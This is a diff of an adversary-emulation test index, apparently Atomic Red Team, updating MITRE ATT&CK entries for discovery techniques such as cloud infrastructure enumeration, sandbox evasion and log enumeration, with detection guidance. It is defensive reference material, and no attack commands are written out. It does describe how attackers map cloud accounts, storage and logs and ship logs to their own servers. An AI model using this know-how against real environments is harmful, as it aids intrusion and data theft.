+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests:
     - name: Delay execution with ping
@@ -103176,91 +103871,90 @@ discovery:
         name: sh
   T1580:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Cloud Infrastructure Discovery
+      description: |-
+        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Regina Elwell
       - Praetorian
       - Isif Ibrahima, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+        components. Monitor logs for actions that could be taken to gather information
+        about cloud infrastructure, including the use of discovery API calls by new
+        or unexpected users and enumerations from unknown or malicious IP addresses.
+        To reduce false positives, valid change management procedures could introduce
+        a known identifier that is logged with the change (e.g., tag or header) if
+        supported by the cloud provider, to help distinguish valid, expected actions
+        from malicious ones.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Instance: Instance Enumeration'
+      - 'Cloud Storage: Cloud Storage Enumeration'
+      - 'Volume: Volume Enumeration'
+      - 'Snapshot: Snapshot Enumeration'
       type: attack-pattern
       id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
       created: '2020-08-20T17:51:25.671Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1580
         url: https://attack.mitre.org/techniques/T1580
+        external_id: T1580
       - source_name: Expel IO Evil in AWS
-        url: https://expel.io/blog/finding-evil-in-aws/
         description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
           Evil in AWS. Retrieved June 25, 2020.
+        url: https://expel.io/blog/finding-evil-in-aws/
       - source_name: AWS Head Bucket
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
         description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
           14, 2022.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
       - source_name: AWS Get Public Access Block
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
       - source_name: AWS Describe DB Instances
-        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
       - source_name: Amazon Describe Instance
-        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
         description: Amazon. (n.d.). describe-instance-information. Retrieved March
           3, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
       - source_name: Amazon Describe Instances API
-        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
         description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
       - source_name: Google Compute Instances
-        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
         description: Google. (n.d.). gcloud compute instances list. Retrieved May
           26, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
       - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       - source_name: Microsoft AZ CLI
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
         description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
       - source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
-        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
         description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
           leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
-        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
-        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Cloud Infrastructure Discovery
-      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
-        components. Monitor logs for actions that could be taken to gather information
-        about cloud infrastructure, including the use of discovery API calls by new
-        or unexpected users and enumerations from unknown or malicious IP addresses.
-        To reduce false positives, valid change management procedures could introduce
-        a known identifier that is logged with the change (e.g., tag or header) if
-        supported by the cloud provider, to help distinguish valid, expected actions
-        from malicious ones.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Instance: Instance Enumeration'
-      - 'Cloud Storage: Cloud Storage Enumeration'
-      - 'Volume: Volume Enumeration'
-      - 'Snapshot: Snapshot Enumeration'
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1580
     atomic_tests:
     - name: AWS - EC2 Enumeration from Cloud Instance
@@ -103374,7 +104068,7 @@ discovery:
           fi
   T1217:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-16T14:24:40.625Z'
       name: Browser Bookmark Discovery
       description: |-
         Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
@@ -103428,7 +104122,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1217
     atomic_tests:
     - name: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux
@@ -103657,7 +104350,7 @@ discovery:
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
-        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
@@ -103695,7 +104388,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016
     atomic_tests:
     - name: System Network Configuration Discovery on Windows
@@ -103912,7 +104604,7 @@ discovery:
         name: command_prompt
   T1087:
     technique:
-      modified: '2024-01-12T23:36:56.245Z'
+      modified: '2024-10-15T15:35:28.784Z'
       name: Account Discovery
       description: |-
         Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -103939,14 +104631,13 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -103975,7 +104666,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1482:
     technique:
@@ -104035,7 +104725,7 @@ discovery:
         .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
         [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
         to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T19:18:22.305Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Domain Trust Discovery
       x_mitre_detection: |
@@ -104054,7 +104744,6 @@ discovery:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1482
     atomic_tests:
     - name: Windows - Discover domain trusts with dsquery
@@ -104323,7 +105012,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1083
     atomic_tests:
     - name: File and Directory Discovery (cmd.exe)
@@ -104531,7 +105219,7 @@ discovery:
         elevation_required: false
   T1049:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-09-06T22:35:34.231Z'
       name: System Network Connections Discovery
       description: "Adversaries may attempt to get a listing of network connections
         to or from the compromised system they are currently accessing or from remote
@@ -104608,7 +105296,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1049
     atomic_tests:
     - name: System Network Connections Discovery
@@ -104708,35 +105395,7 @@ discovery:
           #{SharpView} $syntax -}
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -104748,6 +105407,10 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -104758,8 +105421,14 @@ discovery:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -104769,9 +105438,28 @@ discovery:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1619:
     technique:
@@ -104804,7 +105492,7 @@ discovery:
         Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
 
         Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-11T22:29:43.677Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Cloud Storage Object Discovery
       x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -104822,7 +105510,6 @@ discovery:
       - 'Cloud Storage: Cloud Storage Enumeration'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1619
     atomic_tests:
     - name: AWS S3 Enumeration
@@ -104851,7 +105538,7 @@ discovery:
         elevation_required: false
   T1654:
     technique:
-      modified: '2023-09-30T22:18:46.711Z'
+      modified: '2024-10-15T12:24:40.892Z'
       name: Log Enumeration
       description: |-
         Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -104859,11 +105546,14 @@ discovery:
         Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
 
         Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+        In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
       x_mitre_contributors:
       - Bilal Bahadır Yenici
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -104874,7 +105564,7 @@ discovery:
       - macOS
       - Windows
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -104888,6 +105578,10 @@ discovery:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1654
         external_id: T1654
+      - source_name: Permiso GUI-Vil 2023
+        description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+          Cloud Threat Actor. Retrieved August 30, 2024.'
+        url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
       - source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
         description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
           of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -104907,7 +105601,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1654
     atomic_tests:
     - name: Get-EventLog To Enumerate Windows Security Log
@@ -104943,51 +105636,7 @@ discovery:
         name: command_prompt
   T1087.004:
     technique:
-      x_mitre_platforms:
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
-      type: attack-pattern
-      created: '2020-02-21T21:08:36.570Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.004
-        url: https://attack.mitre.org/techniques/T1087/004
-      - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
-        source_name: Microsoft msolrolemember
-      - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
-          6, 2019.
-        url: https://github.com/True-Demon/raindance
-        source_name: GitHub Raindance
-      - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
-        source_name: Microsoft AZ CLI
-      - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
-          Directory Leaks via Azure. Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
-        source_name: Black Hills Red Teaming MS AD Azure, 2018
-      - source_name: AWS List Roles
-        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
-      - source_name: AWS List Users
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
-        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
-      - source_name: Google Cloud - IAM Servie Accounts List API
-        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
-        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
-          August 4, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:51:18.808Z'
       name: Cloud Account
       description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
         accounts are those created and configured by an organization for use by users,
@@ -105009,19 +105658,61 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
 
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+      created: '2020-02-21T21:08:36.570Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1087/004
+        external_id: T1087.004
+      - source_name: AWS List Roles
+        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+      - source_name: AWS List Users
+        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+      - source_name: Black Hills Red Teaming MS AD Azure, 2018
+        description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+          Directory Leaks via Azure. Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+      - source_name: Google Cloud - IAM Servie Accounts List API
+        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+          August 4, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+      - source_name: Microsoft AZ CLI
+        description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+      - source_name: Microsoft msolrolemember
+        description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+      - source_name: GitHub Raindance
+        description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+          6, 2019.
+        url: https://github.com/True-Demon/raindance
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1057:
     technique:
@@ -105092,7 +105783,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1057
     atomic_tests:
     - name: Process Discovery - ps
